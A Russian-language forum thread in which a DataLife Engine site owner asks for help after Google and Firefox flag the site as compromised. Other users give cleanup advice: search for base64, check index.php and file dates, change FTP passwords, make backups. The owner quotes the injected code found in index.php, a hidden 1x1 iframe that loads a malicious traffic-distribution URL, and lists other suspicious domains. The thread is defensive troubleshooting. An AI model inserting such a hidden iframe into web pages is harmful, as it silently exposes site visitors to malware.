• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.     Помогите модератору этого раздела killoff лично.

Помощь Ломанули сайт?

Статус
В этой теме нельзя размещать новые ответы.
Panadol

Panadol

Продавец здоровья
Регистрация
20 Апр 2007
Сообщения
306
Реакции
292
Сегодня пришло письмо от гугла
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
, а также файрфокс блокирует содержимое сайта:
Для просмотра ссылки Войди или Зарегистрируйся
Кто подскажет что сейчас делать? Где искать заразу?
Дле 8.3
 
поотключать рекламу и поискать по всем двигу base64 и левые адреса, что у вас на скрине (reservus и тд) это первое что бы я сделал)
 
eshkin написал(а):
поотключать рекламу и поискать по всем двигу base64 и левые адреса, что у вас на скрине (reservus и тд) это первое что бы я сделал)
Нажмите для раскрытия...
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны и также шаровые двиги ставьте только с провереных источников и будет вам счастье
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
 
KHyT написал(а):
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны и также шаровые двиги ставьте только с провереных источников и будет вам счастье
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
Нажмите для раскрытия...
Не обязательно. Проверь просто файлики все по дате. Которые были отредактированы день-два назад. Посмотри index.php который лежит в корне. Обычно в него всё дописывают.
Смени пароли на фтп и хостинг.
Проверь свой комп на вирусню.
 
Andrey-varvara написал(а):
Проверь просто файлики все по дате. Которые были отредактированы день-два назад.
Нажмите для раскрытия...
не факт, дату редактирования вполне могли поменять тоже.
а вообще полезно бекапы делать ;)
 
Что-бы дату поменять надо уже иметь права на сервере/вдс, не факт что там не простой виртуалхост, банально можно встроеным антивирусом посмотреть если был снепшот сделал раньше, хотя обычно фрейм как раз в index.php ибо руками вам его вставлять небудут а скрипты настроны на индекс файл, или в начале или в конце :)
 
KHyT написал(а):
Да не кто вас не ломал меньше надо ставить шаровыые шаблоны
Нажмите для раскрытия...
Шаровые шаблоны не ставил - делали на заказ.
KHyT написал(а):
и также шаровые двиги ставьте только с провереных источников и будет вам счастье
Нажмите для раскрытия...
Двиг брал здесь, на нулледе
KHyT написал(а):
У меня такое было проверь DLE антивирусом
А вообше лучше сноси сайт и ставь новый
Нажмите для раскрытия...
ДЛЕ антивирем проверял - ничего не находит
Andrey-varvara написал(а):
Посмотри index.php который лежит в корне. Обычно в него всё дописывают.
Нажмите для раскрытия...
Точно!!! Так и есть - проверил index.php и вот что там было в конце:
Код: 
<IFRAME src="http://reservus.com/tds/go.php?sid=1" width=1 height=1 style="display:none"></IFRAME>
У меня вопрос - как думаете через что сломали? И какие сейчас лучше действия произвести? Стоит ли искать другие ссылки - _663se2s.co.cc, _hsloader.com или они все грузились через _reservus.com?
 
может трой подцепил и пасы от ftp унесли
 
Делай бэкап и меняй все пароли от сайта. Это полезно делать.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху